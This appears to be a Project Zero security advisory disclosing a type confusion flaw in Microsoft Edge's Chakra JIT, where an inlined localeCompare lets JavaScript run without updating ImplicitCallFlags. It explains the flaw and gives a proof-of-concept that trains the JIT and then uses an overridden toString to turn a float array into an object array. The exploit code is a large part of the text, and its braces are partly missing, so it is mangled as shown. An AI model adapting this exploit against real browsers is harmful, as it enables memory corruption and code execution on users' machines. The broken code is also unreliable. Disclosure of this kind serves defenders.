Microsoft Edge Chakra JIT localeCompare Type Confusion

Microsoft Edge Chakra JIT suffers from a type confusion vulnerability in localeCompare.

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Microsoft Edge: Chakra: JIT: Type confusion with localeCompare 


A call to the String.prototype.localeCompare method can be inlineed when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for <a href="/p/project-zero/issues/detail?id=1565" title="Microsoft Edge: Chakra: JIT: ImplicitCallFlags check bypass with Intl" class="closed_ref" rel="nofollow"> issue 1565 </a>.

The only usable code I could find in the JavaScript localeCompare was:
const thatStr = String(that);

I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.

Here's the JavaScript localeCompare.

let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
if (this === undefined || this === null) {

const thisStr = String(this);
const thatStr = String(that);

// Performance optimization to cache the state object and UCollator when the default arguments are provided
// TODO(jahorto): investigate caching when locales and/or options are provided
let stateObject;
if (locales === undefined && options === undefined) {
if (localeCompareStateCache === undefined) {
localeCompareStateCache = _.create();
InitializeCollator(localeCompareStateCache, undefined, undefined);

stateObject = localeCompareStateCache;
} else {
stateObject = _.create();
InitializeCollator(stateObject, locales, options);

return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare */ true);
}), IntlBuiltInFunctionID.StringLocaleCompare);

My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].

[1] <a href="" title="" class="" rel="nofollow"></a>
[2] <a href="" title="" class="" rel="nofollow"></a>
[3] <a href="" title="" class="" rel="nofollow"></a>
[4] <a href="" title="" class="" rel="nofollow"></a>

function opt(arr, s) {
arr[0] = 1.1;

if (s !== null) {
let tmp = 'a'.localeCompare(s);

arr[0] = 2.3023e-320;

function main() {
let arr = [1.1];

for (let i = 0; i < 100; i++) {
'a'.localeCompare('x', []); // Optimize the JavaScript localeCompare

opt(arr, null); // for profiling all instructions in opt.

try {
opt(arr, {toString: () => {
throw 1; // Don't profile "if (locales === undefined && options === undefined) {"
} catch (e) {


opt(arr, {toString: () => {
// Called twice
arr[0] = {};



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: lokihardt

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